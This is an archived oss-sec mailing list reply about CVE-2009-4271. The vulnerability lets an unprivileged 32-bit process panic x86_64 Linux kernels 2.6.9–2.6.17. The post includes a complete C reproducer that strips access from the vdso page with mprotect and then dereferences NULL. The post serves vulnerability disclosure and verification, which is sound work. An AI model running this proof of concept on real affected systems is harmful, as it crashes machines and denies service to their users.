oss-sec mailing list archives

Re: CVE-2009-4271 kernel: 32bit process on 64bit system DoS


From: Marcus Meissner <meissner () suse de>
Date: Wed, 17 Mar 2010 15:07:59 +0100

On Wed, Mar 17, 2010 at 09:01:19AM +0800, Eugene Teo wrote:
> STMicroelectronics reported a flaw in the Linux kernel, versions 2.6.9
> to 2.6.17, when running on x86_64, where a user could use a regular
> 32bit process to trigger a kernel panic, without any special privileges.
> The bug occurs when a 32bit user process triggers a segfault (i.e.
> de-reference a null-pointer) after having performed a mprotect() to
> restrict any rwx access on its VDSO page.
>
> This only affects Red Hat Enterprise Linux 4.
>
> https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2009-4271

Would this be a valid reproducer? :

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>

int main(void){
        FILE *f;
        char line[256];
        void *x,*y;

        /* locate the vdso mapping of this process */
        f = fopen("/proc/self/maps","r");
        if (!f) exit(1);

        x=y=NULL;
        while (fgets(line,sizeof(line),f)) {
                if (strstr(line,"vdso")) {
                        sscanf(line,"%p-%p ",&x,&y);
                        fprintf(stderr,"vdso %p\n", x);
                        break;
                }
        }
        fclose(f);
        if (!x) exit(1);

        /* drop all access to the vdso page, then segfault */
        mprotect(x,4096, PROT_NONE);
        *(char*)NULL = 0;
}

Ciao, Marcus

